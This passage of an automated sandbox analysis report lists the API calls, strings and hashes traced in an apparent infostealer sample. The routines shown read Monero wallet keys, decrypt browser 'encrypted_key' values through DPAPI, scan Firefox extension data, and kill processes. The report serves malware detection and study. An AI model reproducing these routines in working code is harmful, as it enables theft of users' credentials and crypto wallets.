                              • Part of subcall function 0068A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0068AA12
                              • Part of subcall function 0068A8A0: lstrcpy.KERNEL32(?,00690E17), ref: 0068A905
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00686726
                            • ExitProcess.KERNEL32 ref: 00686755
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                            • String ID: <
                            • API String ID: 1148417306-4251816714
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00690E28,00000000,?), ref: 0068882F
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00688836
                            • wsprintfA.USER32 ref: 00688850
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                            Similarity
                            • API ID: Heap$AllocateProcesslstrcpywsprintf
                            • String ID: %dx%d
                            • API String ID: 1695172769-2206825331
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0068951E,00000000), ref: 00688D5B
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00688D62
                            • wsprintfW.USER32 ref: 00688D78
                            Similarity
                            • API ID: Heap$AllocateProcesswsprintf
                            • String ID: %hs
                            • API String ID: 769748085-2783943728
                            APIs
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                              • Part of subcall function 0068A9B0: lstrlen.KERNEL32(?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 0068A9C5
                              • Part of subcall function 0068A9B0: lstrcpy.KERNEL32(00000000), ref: 0068AA04
                              • Part of subcall function 0068A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0068AA12
                              • Part of subcall function 0068A8A0: lstrcpy.KERNEL32(?,00690E17), ref: 0068A905
                              • Part of subcall function 00688B60: GetSystemTime.KERNEL32(00690E1A,012BE078,006905AE,?,?,006713F9,?,0000001A,00690E1A,00000000,?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 00688B86
                              • Part of subcall function 0068A920: lstrcpy.KERNEL32(00000000,?), ref: 0068A972
                              • Part of subcall function 0068A920: lstrcat.KERNEL32(00000000), ref: 0068A982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0067A2E1
                            • lstrlen.KERNEL32(00000000,00000000), ref: 0067A3FF
                            • lstrlen.KERNEL32(00000000), ref: 0067A6BC
                              • Part of subcall function 0068A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0068A7E6
                            • DeleteFileA.KERNEL32(00000000), ref: 0067A743
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            APIs
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                              • Part of subcall function 0068A9B0: lstrlen.KERNEL32(?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 0068A9C5
                              • Part of subcall function 0068A9B0: lstrcpy.KERNEL32(00000000), ref: 0068AA04
                              • Part of subcall function 0068A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0068AA12
                              • Part of subcall function 0068A8A0: lstrcpy.KERNEL32(?,00690E17), ref: 0068A905
                              • Part of subcall function 00688B60: GetSystemTime.KERNEL32(00690E1A,012BE078,006905AE,?,?,006713F9,?,0000001A,00690E1A,00000000,?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 00688B86
                              • Part of subcall function 0068A920: lstrcpy.KERNEL32(00000000,?), ref: 0068A972
                              • Part of subcall function 0068A920: lstrcat.KERNEL32(00000000), ref: 0068A982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0067D481
                            • lstrlen.KERNEL32(00000000), ref: 0067D698
                            • lstrlen.KERNEL32(00000000), ref: 0067D6AC
                            • DeleteFileA.KERNEL32(00000000), ref: 0067D72B
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            APIs
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                              • Part of subcall function 0068A9B0: lstrlen.KERNEL32(?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 0068A9C5
                              • Part of subcall function 0068A9B0: lstrcpy.KERNEL32(00000000), ref: 0068AA04
                              • Part of subcall function 0068A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0068AA12
                              • Part of subcall function 0068A8A0: lstrcpy.KERNEL32(?,00690E17), ref: 0068A905
                              • Part of subcall function 00688B60: GetSystemTime.KERNEL32(00690E1A,012BE078,006905AE,?,?,006713F9,?,0000001A,00690E1A,00000000,?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 00688B86
                              • Part of subcall function 0068A920: lstrcpy.KERNEL32(00000000,?), ref: 0068A972
                              • Part of subcall function 0068A920: lstrcat.KERNEL32(00000000), ref: 0068A982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0067D801
                            • lstrlen.KERNEL32(00000000), ref: 0067D99F
                            • lstrlen.KERNEL32(00000000), ref: 0067D9B3
                            • DeleteFileA.KERNEL32(00000000), ref: 0067DA32
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            APIs
                              • Part of subcall function 0068A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0068A7E6
                              • Part of subcall function 006799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006799EC
                              • Part of subcall function 006799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00679A11
                              • Part of subcall function 006799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00679A31
                              • Part of subcall function 006799C0: ReadFile.KERNEL32(000000FF,?,00000000,0067148F,00000000), ref: 00679A5A
                              • Part of subcall function 006799C0: LocalFree.KERNEL32(0067148F), ref: 00679A90
                              • Part of subcall function 006799C0: CloseHandle.KERNEL32(000000FF), ref: 00679A9A
                              • Part of subcall function 00688E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00688E52
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                              • Part of subcall function 0068A9B0: lstrlen.KERNEL32(?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 0068A9C5
                              • Part of subcall function 0068A9B0: lstrcpy.KERNEL32(00000000), ref: 0068AA04
                              • Part of subcall function 0068A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0068AA12
                              • Part of subcall function 0068A8A0: lstrcpy.KERNEL32(?,00690E17), ref: 0068A905
                              • Part of subcall function 0068A920: lstrcpy.KERNEL32(00000000,?), ref: 0068A972
                              • Part of subcall function 0068A920: lstrcat.KERNEL32(00000000), ref: 0068A982
                            • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00691580,00690D92), ref: 0067F54C
                            • lstrlen.KERNEL32(00000000), ref: 0067F56B
                            Similarity
                            • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                            • String ID: ^userContextId=4294967295$moz-extension+++
                            • API String ID: 998311485-3310892237
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID:
                            • API String ID: 367037083-0
                            • Opcode ID: 23480eb6535edf93ec1bd71542cabf95f3f3a181cec0da64a545461649ba0dc5
                            • Instruction ID: c530da1b0d93020b35d928d3744d5f427a5fea3b0614e8f985ac5763b7f98406
                            • Opcode Fuzzy Hash: 23480eb6535edf93ec1bd71542cabf95f3f3a181cec0da64a545461649ba0dc5
                            • Instruction Fuzzy Hash: 254130B1D10109AFDF04FFE4C845AEEB77AAF44704F108219E81676350EB75AA46CFA6
                            APIs
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                              • Part of subcall function 006799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006799EC
                              • Part of subcall function 006799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00679A11
                              • Part of subcall function 006799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00679A31
                              • Part of subcall function 006799C0: ReadFile.KERNEL32(000000FF,?,00000000,0067148F,00000000), ref: 00679A5A
                              • Part of subcall function 006799C0: LocalFree.KERNEL32(0067148F), ref: 00679A90
                              • Part of subcall function 006799C0: CloseHandle.KERNEL32(000000FF), ref: 00679A9A
                              • Part of subcall function 00688E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00688E52
                            • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00679D39
                              • Part of subcall function 00679AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ng,00000000,00000000), ref: 00679AEF
                              • Part of subcall function 00679AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00674EEE,00000000,?), ref: 00679B01
                              • Part of subcall function 00679AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ng,00000000,00000000), ref: 00679B2A
                              • Part of subcall function 00679AC0: LocalFree.KERNEL32(?,?,?,?,00674EEE,00000000,?), ref: 00679B3F
                              • Part of subcall function 00679B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00679B84
                              • Part of subcall function 00679B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00679BA3
                              • Part of subcall function 00679B60: LocalFree.KERNEL32(?), ref: 00679BD3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                            • String ID: $"encrypted_key":"$DPAPI
                            • API String ID: 2100535398-738592651
                            • Opcode ID: 69b881c5f942f67036effd8b0aa38915b6e1df59910a74d5f1ef4515f2601aa5
                            • Instruction ID: 83fdb31a83c992e707f353eeb5591e5870502b4ee878ed8c7330f8c265a9a6f6
                            • Opcode Fuzzy Hash: 69b881c5f942f67036effd8b0aa38915b6e1df59910a74d5f1ef4515f2601aa5
                            • Instruction Fuzzy Hash: 293150B5D10109ABCF14EBE4DC85AEFB7BAAF48304F14851DE905A7241FB309A04CBB5
                            APIs
                            • memset.MSVCRT ref: 006894EB
                              • Part of subcall function 00688D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0068951E,00000000), ref: 00688D5B
                              • Part of subcall function 00688D50: RtlAllocateHeap.NTDLL(00000000), ref: 00688D62
                              • Part of subcall function 00688D50: wsprintfW.USER32 ref: 00688D78
                            • OpenProcess.KERNEL32(00001001,00000000,?), ref: 006895AB
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 006895C9
                            • CloseHandle.KERNEL32(00000000), ref: 006895D6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                            • String ID:
                            • API String ID: 3729781310-0
                            • Opcode ID: 34e6e4b95fea3c4c46d6f614126ce796b0d9f93d635a036d82621c4688fae01c
                            • Instruction ID: 293fc828b2f76428abcede58ad339ea18641b96f58df01ef008c681117c37894
                            • Opcode Fuzzy Hash: 34e6e4b95fea3c4c46d6f614126ce796b0d9f93d635a036d82621c4688fae01c
                            • Instruction Fuzzy Hash: 33314DB1E00208AFDB18EFD0CC49BEDB779FF44300F104659E506AB284DB74AA89CB56
                            APIs
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,006905B7), ref: 006886CA
                            • Process32First.KERNEL32(?,00000128), ref: 006886DE
                            • Process32Next.KERNEL32(?,00000128), ref: 006886F3
                              • Part of subcall function 0068A9B0: lstrlen.KERNEL32(?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 0068A9C5
                              • Part of subcall function 0068A9B0: lstrcpy.KERNEL32(00000000), ref: 0068AA04
                              • Part of subcall function 0068A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0068AA12
                              • Part of subcall function 0068A8A0: lstrcpy.KERNEL32(?,00690E17), ref: 0068A905
                            • CloseHandle.KERNEL32(?), ref: 00688761
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                            • String ID:
                            • API String ID: 1066202413-0
                            • Opcode ID: 0e7be6a5909aed3eaefcc46251c67c8e98a99835bc7f843f1862bea9d147ab70
                            • Instruction ID: e06f70d9eab2cd9377d1e63c579bd4e01b03c87978fda97287116adb4e0f5cb1
                            • Opcode Fuzzy Hash: 0e7be6a5909aed3eaefcc46251c67c8e98a99835bc7f843f1862bea9d147ab70
                            • Instruction Fuzzy Hash: BD316DB1901218ABDB64EF90CC41FEEB779FB45700F5042AEE50AB21A0DF346A45CFA1
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00690E00,00000000,?), ref: 006879B0
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006879B7
                            • GetLocalTime.KERNEL32(?,?,?,?,?,00690E00,00000000,?), ref: 006879C4
                            • wsprintfA.USER32 ref: 006879F3
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateLocalProcessTimewsprintf
                            • String ID:
                            • API String ID: 377395780-0
                            • Opcode ID: f8c983418e78955b737ac9fad206718a30922128c12724e74ef3e3f0deb370e4
                            • Instruction ID: c8cd86f07ad6188a07a2941c841e8f81c5d55ee5845f57e5fe183a33800d223d
                            • Opcode Fuzzy Hash: f8c983418e78955b737ac9fad206718a30922128c12724e74ef3e3f0deb370e4
                            • Instruction Fuzzy Hash: 091127B2904118ABCB18DFC9DD45BBEB7F8FB4CB11F10421AF605A2280E2399940CBB1
                            APIs
                            • __getptd.LIBCMT ref: 0068C74E
                              • Part of subcall function 0068BF9F: __amsg_exit.LIBCMT ref: 0068BFAF
                            • __getptd.LIBCMT ref: 0068C765
                            • __amsg_exit.LIBCMT ref: 0068C773
                            • __updatetlocinfoEx_nolock.LIBCMT ref: 0068C797
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                            • String ID:
                            • API String ID: 300741435-0
                            • Opcode ID: 95b77741dc33f04ee950ad3f64cee4c7c120a291d2bbd66b3b5b96a9c8d5c4ad
                            • Instruction ID: 03757ef1e2f1a2649c39623c230ed3fe0bd7029076ca926b1d19f6129c9e863f
                            • Opcode Fuzzy Hash: 95b77741dc33f04ee950ad3f64cee4c7c120a291d2bbd66b3b5b96a9c8d5c4ad
                            • Instruction Fuzzy Hash: F3F090329446109BD7A0BFB85807B8D33A3AF00730F21534EF604A62D2DB745941DF6E
                            APIs
                              • Part of subcall function 00688DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00688E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 00684F7A
                            • lstrcat.KERNEL32(?,00691070), ref: 00684F97
                            • lstrcat.KERNEL32(?,012B8BA8), ref: 00684FAB
                            • lstrcat.KERNEL32(?,00691074), ref: 00684FBD
                              • Part of subcall function 00684910: wsprintfA.USER32 ref: 0068492C
                              • Part of subcall function 00684910: FindFirstFileA.KERNEL32(?,?), ref: 00684943
                              • Part of subcall function 00684910: StrCmpCA.SHLWAPI(?,00690FDC), ref: 00684971
                              • Part of subcall function 00684910: StrCmpCA.SHLWAPI(?,00690FE0), ref: 00684987
                              • Part of subcall function 00684910: FindNextFileA.KERNEL32(000000FF,?), ref: 00684B7D
                              • Part of subcall function 00684910: FindClose.KERNEL32(000000FF), ref: 00684B92
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                            • String ID:
                            • API String ID: 2667927680-0
                            • Opcode ID: ce4651187132bdc4ade57111174aab28dba7e394c334157377c8e537bdfa5d19
                            • Instruction ID: 8f8d4a76c3f070bad2d4b226b54c8057ac8167a5d958962a0d60f6afdc3b652b
                            • Opcode Fuzzy Hash: ce4651187132bdc4ade57111174aab28dba7e394c334157377c8e537bdfa5d19
                            • Instruction Fuzzy Hash: 5021CBB69002046BDB98F7B0DC46EED333DBB54300F404799B64957581EE7597C88B96